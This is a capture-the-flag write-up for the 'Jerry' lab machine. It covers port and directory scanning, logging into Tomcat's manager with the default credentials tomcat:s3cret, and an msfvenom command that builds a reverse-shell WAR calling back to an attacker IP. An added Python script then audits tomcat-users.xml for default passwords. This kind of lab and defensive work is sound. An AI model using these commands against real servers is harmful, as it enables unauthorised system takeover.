Jerry

OS: Windows, Difficulty: Easy, IP: 10.10.10.95

Initial Enumeration

sudo nmap -T5 -p- -oN T-all 10.10.10.95
# Nmap 7.70 scan initiated Sat Jul  6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds

Port 8080 was a default installation of Apache Tomcat. The server version (7.0.88) was last updated in May 2018, so Searchsploit listed no exploits for it.

gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)

The manager one seemed interesting, and when I hit the URL it asked for credentials. I tried the default Tomcat credentials tomcat:s3cret and they worked.

User Own & Root Own

An option to deploy my own WAR file was available, so I built a reverse shell WAR for the server with msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war

The WAR was uploaded, and once the URL of the deployed application was hit I got a reverse shell as NT AUTHORITY\SYSTEM.
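The two findings above, a well-known default manager password and an account holding a role that can deploy WARs, are exactly what a defender should audit in tomcat-users.xml. The following is an added example, not code from the original writeup: it parses a tomcat-users.xml body and flags default credentials and WAR-deploying roles. The sample file, the list of default credential pairs and the function names are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Credential pairs that appear as examples in Tomcat's shipped tomcat-users.xml
# and manager docs, plus common guesses (assumed list; extend as needed).
DEFAULT_CREDS = {("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
                 ("admin", ""), ("both", "tomcat"), ("role1", "tomcat")}
# Manager roles whose holders can deploy an arbitrary WAR (and thus run code).
DEPLOY_ROLES = {"manager-gui", "manager-script"}

def _local(tag):
    # Strip a namespace prefix like "{http://tomcat.apache.org/xml}user".
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (severity, username, message) findings for a tomcat-users.xml body."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        user = el.get("username") or el.get("name") or ""
        pwd = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if (user, pwd) in DEFAULT_CREDS:
            sev = "CRITICAL" if deploy else "HIGH"
            findings.append((sev, user, "well-known default password"))
        elif deploy and len(pwd) < 12:
            findings.append(("MEDIUM", user, "short password on a WAR-deploying account"))
        if deploy:
            findings.append(("INFO", user, "can deploy WARs via " + ",".join(deploy)))
    return findings

# Constructed sample file (not the box's real configuration).
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="ops" password="Correct-Horse-Battery-Staple-42" roles="manager-script"/>
  <user username="guest" password="guest" roles=""/>
</tomcat-users>
"""

if __name__ == "__main__":
    for sev, user, msg in audit_tomcat_users(SAMPLE):
        print(f"{sev:8} {user:8} {msg}")
```

Running it against the sample flags the tomcat account as CRITICAL (default password on a role that can deploy WARs) and reports ops only as informational.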

Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,598,893,056 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***

root.txt
04a8b***

Learning Outcome

Whenever you get a shell, check who you are before running around enumerating the server. In this case it took me quite a while to realise that I had been running as root from the very beginning.
